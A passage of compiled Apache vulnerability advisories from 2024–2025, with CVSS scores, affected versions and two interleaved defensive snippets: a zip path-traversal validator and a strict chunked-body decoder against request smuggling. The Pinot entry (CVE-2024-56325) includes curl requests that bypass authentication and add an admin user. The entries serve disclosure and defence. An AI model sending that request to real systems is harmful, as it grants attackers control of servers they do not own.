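    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            # Reject absolute paths in either convention (drive letters, UNC,
            # leading slash) and any backslash, which zip names should not carry.
            if "\\" in name or ntpath.isabs(name) or posixpath.isabs(name):
                bad.append(name)
                continue
            target = (dest_real / name).resolve()
            # Compare against the resolved destination, so '..' segments and
            # symlink tricks are judged on the final path, not on the string.
            if target != dest_real and dest_real not in target.parents:
                bad.append(name)
    return bad


def safe_extract(zip_bytes: bytes, dest: str) -> list:
    """Validate first, extract second: refuse the whole archive on any unsafe entry."""
    bad = unsafe_entries(zip_bytes, dest)
    if bad:
        raise ValueError("refusing archive with unsafe entries: %r" % bad)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        zf.extractall(dest)
        return zf.namelist()


if __name__ == "__main__":
    print(unsafe_entries(build_malicious_configset(), "/var/solr/configsets/incoming"))
```

Validate-then-extract, rather than filtering entries one by one during extraction, so that a partially written configset is never left behind; the authorization workaround the advisory recommends limits who can reach the endpoint, this check limits what an authorized user's archive can do.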
CVE-2024-52046

The ObjectSerializationDecoder in Apache MINA uses Java's native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks. This issue affects MINA core versions 2.0.X, 2.1.X and 2.2.X, and will be fixed by the releases 2.0.27, 2.1.10 and 2.2.4. It is also important to note that an application using the MINA core library will only be affected if the IoBuffer#getObject() method is called, and this specific method is potentially called when adding a ProtocolCodecFilter instance using the ObjectSerializationCodecFactory class in the filter chain. If your application is specifically using those classes, you have to upgrade to the latest version of the MINA core library. Upgrading will not be enough: you also need to explicitly allow the classes the decoder will accept in the ObjectSerializationDecoder instance, using one of the three new methods:

    /**
     * Accept class names where the supplied ClassNameMatcher matches for
     * deserialization, unless they are otherwise rejected.
     *
     * @param classNameMatcher the matcher to use
     */
    public void accept(ClassNameMatcher classNameMatcher)

    /**
     * Accept class names that match the supplied pattern for
     * deserialization, unless they are otherwise rejected.
     *
     * @param pattern standard Java regexp
     */
    public void accept(Pattern pattern)

    /**
     * Accept the wildcard specified classes for deserialization,
     * unless they are otherwise rejected.
     *
     * @param patterns Wildcard file name patterns as defined by
     * {@link org.apache.commons.io.FilenameUtils#wildcardMatch(String, String) FilenameUtils.wildcardMatch}
     */
    public void accept(String... patterns)

By default, the decoder will reject *all* classes that are present in the incoming data.
Note: The FtpServer, SSHd and Vysper sub-projects are not affected by this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache mina *
CVE-2024-52067

Apache NiFi 1.16.0 through 1.28.0 and 2.0.0-M1 through 2.0.0-M4 include optional debug logging of Parameter Context values during the flow synchronization process. An authorized administrator with access to change logging levels could enable debug logging for framework flow synchronization, causing the application to write Parameter names and values to the application log. Parameter Context values may contain sensitive information depending on application flow configuration. Deployments of Apache NiFi with the default Logback configuration do not log Parameter Context values. Upgrading to Apache NiFi 2.0.0 or 1.28.1 is the recommended mitigation, eliminating Parameter value logging from the flow synchronization process regardless of the Logback configuration.

Products Affected

Vendor Product Version
apache nifi 2.0.0
apache nifi *
CVE-2024-52279

Improper Input Validation vulnerability in Apache Zeppelin. The fix for JDBC URL validation in CVE-2024-31864 did not account for URL encoded input. This issue affects Apache Zeppelin: from 0.11.1 before 0.12.0. Users are recommended to upgrade to version 0.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2024-52316

Unchecked Error Condition vulnerability in Apache Tomcat. If Tomcat is configured to use a custom Jakarta Authentication (formerly JASPIC) ServerAuthContext component which may throw an exception during the authentication process without explicitly setting an HTTP status to indicate failure, the authentication may not fail, allowing the user to bypass the authentication process. There are no known Jakarta Authentication components that behave in this way. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M26, from 10.1.0-M1 through 10.1.30, from 9.0.0-M1 through 9.0.95. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 11.0
CVE-2024-52317

Incorrect object re-cycling and re-use vulnerability in Apache Tomcat. Incorrect recycling of the request and response used by HTTP/2 requests could lead to request and/or response mix-up between users. This issue affects Apache Tomcat: from 11.0.0-M23 through 11.0.0-M26, from 10.1.27 through 10.1.30, from 9.0.92 through 9.0.95. Users are recommended to upgrade to version 11.0.0, 10.1.31 or 9.0.96, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
CVE-2024-52318

Incorrect object recycling and reuse vulnerability in Apache Tomcat. This issue affects Apache Tomcat: 11.0.0, 10.1.31, 9.0.96. Users are recommended to upgrade to version 11.0.1, 10.1.32 or 9.0.97, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

Products Affected

Vendor Product Version
apache tomcat 11.0.0
apache tomcat 9.0.96
apache tomcat 10.1.31
CVE-2024-52338

Deserialization of untrusted data in IPC and Parquet readers in the Apache Arrow R package versions 4.0.0 through 16.1.0 allows arbitrary code execution. An application is vulnerable if it reads Arrow IPC, Feather or Parquet data from untrusted sources (for example, user-supplied input files). This vulnerability only affects the arrow R package, not other Apache Arrow implementations or bindings unless those bindings are specifically used via the R package (for example, an R application that embeds a Python interpreter and uses PyArrow to read files from untrusted sources is still vulnerable if the arrow R package is an affected version). It is recommended that users of the arrow R package upgrade to 17.0.0 or later. Similarly, it is recommended that downstream libraries upgrade their dependency requirements to arrow 17.0.0 or later. If using an affected version of the package, untrusted data can be read into a Table and its internal to_data_frame() method can be used as a workaround (e.g., read_parquet(..., as_data_frame = FALSE)$to_data_frame()). This issue affects the Apache Arrow R package: from 4.0.0 through 16.1.0. Users are recommended to upgrade to version 17.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache arrow *
CVE-2024-52577

In Apache Ignite versions from 2.6.0 and before 2.17.0, configured Class Serialization Filters are ignored for some Ignite endpoints. The vulnerability could be exploited if an attacker manually crafts an Ignite message containing a vulnerable object whose class is present in the Ignite server classpath and sends it to Ignite server endpoints. Deserialization of such a message by the Ignite server may result in the execution of arbitrary code on the Apache Ignite server side.

Products Affected

Vendor Product Version
apache ignite *
CVE-2024-53299

The request handling in the core in Apache Wicket 7.0.0 on any platform allows an attacker to create a DoS via multiple requests to server resources. Users are recommended to upgrade to versions 9.19.0 or 10.3.0, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache wicket *
CVE-2024-53677

File upload logic in Apache Struts is flawed. An attacker can manipulate file upload parameters to enable path traversal, and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using the old file upload logic based on FileuploadInterceptor, your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067

Products Affected

Vendor Product Version
apache struts *
CVE-2024-53678

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache VCL. Users can modify form data submitted when requesting a new Block Allocation such that a SELECT SQL statement is modified. The data returned by the SELECT statement is not viewable by the attacker. This issue affects all versions of Apache VCL from 2.2 through 2.5.1. Users are recommended to upgrade to version 2.5.2, which fixes the issue.

Products Affected

Vendor Product Version
apache vcl *
CVE-2024-53679

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache VCL in the User Lookup form. A user with sufficient rights to be able to view this part of the site can craft a URL or be tricked in to clicking a URL that will give a specified user elevated rights. This issue affects all versions of Apache VCL through 2.5.1. Users are recommended to upgrade to version 2.5.2, which fixes the issue.

Products Affected

Vendor Product Version
apache vcl *
CVE-2024-53868

Apache Traffic Server allows request smuggling if chunked messages are malformed.  This issue affects Apache Traffic Server: from 9.2.0 through 9.2.9, from 10.0.0 through 10.0.4. Users are recommended to upgrade to version 9.2.10 or 10.0.5, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache traffic_server *
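The advisory does not say which malformation Traffic Server mishandled, so the following is a generic example and not ATS code: a chunked-body decoder that accepts only the strict grammar (pure hexadecimal chunk-size, optional extension after ';', exact CRLF after the size line and after every chunk, a terminating zero chunk and trailer section) and rejects everything else. Smuggling works by finding an input that two parsers in the chain interpret differently; a front proxy that refuses ambiguous bodies outright removes that disagreement. The sample bodies in the test are constructed.

```python
import re

# RFC 9112 chunk-size: 1*HEXDIG. Cap at 8 digits so the size can never overflow
# a 32-bit length or be padded with leading zeros to confuse another parser.
CHUNK_SIZE_RE = re.compile(rb"^[0-9A-Fa-f]{1,8}$")


class ChunkedError(ValueError):
    """Raised on any deviation from the strict chunked grammar."""


def decode_chunked_strict(body: bytes):
    """Decode a chunked message body strictly.
    Returns (payload, bytes_remaining_after_the_message). Raises ChunkedError on
    whitespace around the size, sign characters, '0x' prefixes, missing CRLFs,
    truncated chunks or an unterminated trailer section."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ChunkedError("chunk-size line not terminated by CRLF")
        # Chunk extensions (";name=value") are permitted but the size itself
        # must be nothing but hex digits.
        size_field = body[pos:eol].split(b";", 1)[0]
        if not CHUNK_SIZE_RE.match(size_field):
            raise ChunkedError("malformed chunk-size %r" % size_field)
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            break
        if len(body) - pos < size + 2:
            raise ChunkedError("truncated chunk data")
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ChunkedError("chunk data not followed by CRLF")
        pos += 2
    # Trailer section: zero or more header lines, then an empty line.
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ChunkedError("unterminated trailer section")
        if eol == pos:
            pos += 2
            break
        pos = eol + 2
    return bytes(out), body[pos:]


def is_well_formed(body: bytes) -> bool:
    """True only if the body parses under the strict grammar and nothing follows it."""
    try:
        _, rest = decode_chunked_strict(body)
    except ChunkedError:
        return False
    return rest == b""


if __name__ == "__main__":
    print(decode_chunked_strict(b"5\r\nhello\r\n0\r\n\r\n"))
    print(is_well_formed(b" 5\r\nhello\r\n0\r\n\r\n"))  # leading space: rejected
```

A related check a front proxy should make before this decoder ever runs is to reject requests that carry both Content-Length and Transfer-Encoding, since that is the other classic source of framing disagreement between hops.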
CVE-2024-53947

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Superset. Specifically, certain engine-specific functions are not checked, which allows attackers to bypass Apache Superset's SQL authorization. This issue is a follow-up to CVE-2024-39887 with additional disallowed PostgreSQL functions now included: query_to_xml_and_xmlschema, table_to_xml, table_to_xml_and_xmlschema. This issue affects Apache Superset: <4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue or add these Postgres functions to the config set DISALLOWED_SQL_FUNCTIONS.

Products Affected

Vendor Product Version
apache superset *
CVE-2024-53948

Generation of Error Message Containing analytics metadata Information in Apache Superset. This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-53949

Improper Authorization vulnerability in Apache Superset when FAB_ADD_SECURITY_API is enabled (disabled by default). Allows lower-privilege users to use this API. This issue affects Apache Superset: from 2.0.0 before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-54676

Vendor: The Apache Software Foundation. Versions Affected: Apache OpenMeetings from 2.1.0 before 8.0.0. Description: The default clustering instructions at https://openmeetings.apache.org/Clustering.html do not specify white/black lists for OpenJPA; this leads to possible deserialisation of untrusted data. Users are recommended to upgrade to version 8.0.0 and update their startup scripts to include the relevant 'openjpa.serialization.class.blacklist' and 'openjpa.serialization.class.whitelist' configurations as shown in the documentation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2024-54677

Uncontrolled Resource Consumption vulnerability in the examples web application provided with Apache Tomcat leads to denial of service. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-55532

Improper Neutralization of Formula Elements in Export CSV feature of Apache Ranger in Apache Ranger Version < 2.6.0. Users are recommended to upgrade to version 2.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ranger *
CVE-2024-55633

Improper Authorization vulnerability in Apache Superset. On Postgres analytic databases an attacker with SQLLab access can craft a specially designed SQL DML statement that is incorrectly identified as a read-only query, enabling its execution. Non-Postgres analytics database connections and Postgres analytics database connections set up with a read-only user (advised) are not vulnerable. This issue affects Apache Superset: before 4.1.0. Users are recommended to upgrade to version 4.1.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-56128

Incorrect Implementation of Authentication Algorithm in Apache Kafka's SCRAM implementation.

Issue Summary: Apache Kafka's implementation of the Salted Challenge Response Authentication Mechanism (SCRAM) did not fully adhere to the requirements of RFC 5802 [1]. Specifically, as per RFC 5802, the server must verify that the nonce sent by the client in the second message matches the nonce sent by the server in its first message. However, Kafka's SCRAM implementation did not perform this validation.

Impact: This vulnerability is exploitable only when an attacker has plaintext access to the SCRAM authentication exchange. However, the usage of SCRAM over plaintext is strongly discouraged as it is considered an insecure practice [2]. Apache Kafka recommends deploying SCRAM exclusively with TLS encryption to protect SCRAM exchanges from interception [3]. Deployments using SCRAM with TLS are not affected by this issue.

How to Detect If You Are Impacted: If your deployment uses SCRAM authentication over plaintext communication channels (without TLS encryption), you are likely impacted. To check if TLS is enabled, review your server.properties configuration file for the listeners property. If you have SASL_PLAINTEXT in the listeners, then you are likely impacted.

Fix Details: The issue has been addressed by introducing nonce verification in the final message of the SCRAM authentication exchange to ensure compliance with RFC 5802.

Affected Versions: Apache Kafka versions 0.10.2.0 through 3.9.0, excluding the fixed versions below.

Fixed Versions: 3.9.0, 3.8.1, 3.7.2. Users are advised to upgrade to 3.7.2 or later to mitigate this issue.

Recommendations for Mitigation: Users unable to upgrade to the fixed versions can mitigate the issue by:
- Using TLS with SCRAM Authentication: Always deploy SCRAM over TLS to encrypt authentication exchanges and protect against interception.
- Considering Alternative Authentication Mechanisms: Evaluate alternative authentication mechanisms, such as PLAIN, Kerberos or OAuth with TLS, which provide additional layers of security.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache kafka *
apache kafka 3.8.0
CVE-2024-56180

CWE-502 Deserialization of Untrusted Data in the eventmesh-meta-raft plugin module of the Apache EventMesh master branch (no release version) on Windows, Linux, macOS and similar platforms allows attackers to send a controlled message and achieve remote code execution via the Hessian deserialization RPC protocol. Users can use the code under the master branch in the project repo or version 1.11.0 to fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache eventmesh *
CVE-2024-56195

Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.2.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 9.2.9 or 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56196

Improper Access Control vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 10.0.0 through 10.0.3. Users are recommended to upgrade to version 10.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56202

Expected Behavior Violation vulnerability in Apache Traffic Server. This issue affects Apache Traffic Server: from 9.0.0 through 9.2.8, from 10.0.0 through 10.0.3. Users are recommended to upgrade to versions 9.2.9 or 10.0.4 or newer, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2024-56325

Authentication Bypass Issue: if the path does not contain "/" and contains ".", authentication is not required.

Expected Normal Request and Response Example:
    curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example:
    curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}

A new user gets added bypassing authentication, enabling the user to control Pinot.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache pinot *
CVE-2024-56337

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. The mitigation for CVE-2024-50379 was incomplete. Users running Tomcat on a case insensitive file system with the default servlet write enabled (readonly initialisation parameter set to the non-default value of false) may need additional configuration to fully mitigate CVE-2024-50379, depending on which version of Java they are using with Tomcat:
- running on Java 8 or Java 11: the system property sun.io.useCanonCaches must be explicitly set to false (it defaults to true)
- running on Java 17: the system property sun.io.useCanonCaches, if set, must be set to false (it defaults to false)
- running on Java 21 onwards: no further configuration is required (the system property and the problematic cache have been removed)
Tomcat 11.0.3, 10.1.35 and 9.0.99 onwards will include checks that sun.io.useCanonCaches is set appropriately before allowing the default servlet to be write enabled on a case insensitive file system. Tomcat will also set sun.io.useCanonCaches to false by default where it can.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tomcat *
netapp bootstrap_os -
CVE-2024-56373

A DAG Author (who already has quite a lot of permissions) could manipulate the database of Airflow 2 in a way that executes arbitrary code in the web-server context, which they should normally not be able to do, leading to potential remote code execution in the context of the web-server (server-side) as a result of a user viewing historical task information. The functionality responsible for that (log template history) has been disabled by default in 2.11.1, and users should upgrade to Airflow 3 if they want to continue to use log template history. They can also manually modify historical log file names if they want to see historical logs that were generated before the last log template change.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.4 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H 1.7 6.0

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-56512

Apache NiFi 1.10.0 through 2.0.0 are missing fine-grained authorization checking for Parameter Contexts, referenced Controller Services, and referenced Parameter Providers, when creating new Process Groups. Creating a new Process Group can include binding to a Parameter Context, but in cases where the Process Group did not reference any Parameter values, the framework did not check user authorization for the bound Parameter Context. Missing authorization for a bound Parameter Context enabled clients to download non-sensitive Parameter values after creating the Process Group. Creating a new Process Group can also include referencing existing Controller Services or Parameter Providers. The framework did not check user authorization for referenced Controller Services or Parameter Providers, enabling clients to create Process Groups and use these components that were otherwise unauthorized. This vulnerability is limited in scope to authenticated users authorized to create Process Groups. The scope is further limited to deployments with component-based authorization policies. Upgrading to Apache NiFi 2.1.0 is the recommended mitigation, which includes authorization checking for Parameter and Controller Service references on Process Group creation.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache nifi *
CVE-2024-56736

Server-Side Request Forgery (SSRF) vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat (incubating): before 1.7.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2025-22828

CloudStack users can add and read comments (annotations) on resources they are authorised to access. Due to an access validation issue that affects Apache CloudStack versions from 4.16.0, users who have access, prior access or knowledge of resource UUIDs can list and add comments (annotations) to such resources. An attacker with a user-account and access or prior knowledge of resource UUIDs may exploit this issue to read the contents of the comments (annotations) or add malicious comments (annotations) to such resources. This may cause potential loss of confidentiality of CloudStack environments and resources if the comments (annotations) contain any privileged information. However, guessing or brute-forcing resource UUIDs is generally hard to impossible, and access to listing or adding comments isn't the same as access to CloudStack resources, making this issue of very low severity and general low impact. CloudStack admins may also disallow listAnnotations and addAnnotation API access to non-admin roles in their environment as an interim measure.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache cloudstack *
CVE-2025-22829

The CloudStack Quota plugin has improper privilege management logic in version 4.20.0.0. Anyone with authenticated user-account access in CloudStack 4.20.0.0 environments where this plugin is enabled, and who has access to specific APIs, can enable or disable reception of quota-related emails for any account in the environment and list their configurations. Quota plugin users using CloudStack 4.20.0.0 are recommended to upgrade to CloudStack version 4.20.1.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache cloudstack 4.20.0.0
CVE-2025-23015

Privilege Defined With Unsafe Actions vulnerability in Apache Cassandra. A user with MODIFY permission ON ALL KEYSPACES can escalate privileges to superuser within a targeted Cassandra cluster via unsafe actions to a system resource. Operators granting data MODIFY permission on all keyspaces on affected versions should review data access rules for potential breaches. This issue affects Apache Cassandra through 3.0.30, 3.11.17, 4.0.15, 4.1.7, 5.0.2. Users are recommended to upgrade to versions 3.0.31, 3.11.18, 4.0.16, 4.1.8, 5.0.3, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2025-23048

In some mod_ssl configurations on Apache HTTP Server 2.4.35 through to 2.4.63, an access control bypass by trusted clients is possible using TLS 1.3 session resumption. Configurations are affected when mod_ssl is configured for multiple virtual hosts, with each restricted to a different set of trusted client certificates (for example with a different SSLCACertificateFile/Path setting). In such a case, a client trusted to access one virtual host may be able to access another virtual host, if SSLStrictSNIVHostCheck is not enabled in either virtual host.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-23184

A potential denial of service vulnerability is present in versions of Apache CXF before 3.5.10, 3.6.5 and 4.0.6. In some edge cases, the CachedOutputStream instances may not be closed and, if backed by temporary files, may fill up the file system (it applies to servers and clients).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6
security@apache.org 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H 2.2 3.6

Products Affected

Vendor Product Version
apache cxf *
CVE-2025-23195

An XML External Entity (XXE) vulnerability exists in the Ambari/Oozie project, allowing an attacker to inject malicious XML entities. This vulnerability occurs due to insecure parsing of XML input using the `DocumentBuilderFactory` class without disabling external entity resolution. An attacker can exploit this vulnerability to read arbitrary files on the server or perform server-side request forgery (SSRF) attacks. The issue has been fixed in both Ambari 2.7.9 and the trunk branch.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache ambari *
CVE-2025-23196

A code injection vulnerability exists in the Ambari Alert Definition feature, allowing authenticated users to inject and execute arbitrary shell commands. The vulnerability arises when defining alert scripts, where the script filename field is executed using `sh -c`. An attacker with authenticated access can exploit this vulnerability to inject malicious commands, leading to remote code execution on the server. The issue has been fixed in the latest versions of Ambari.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
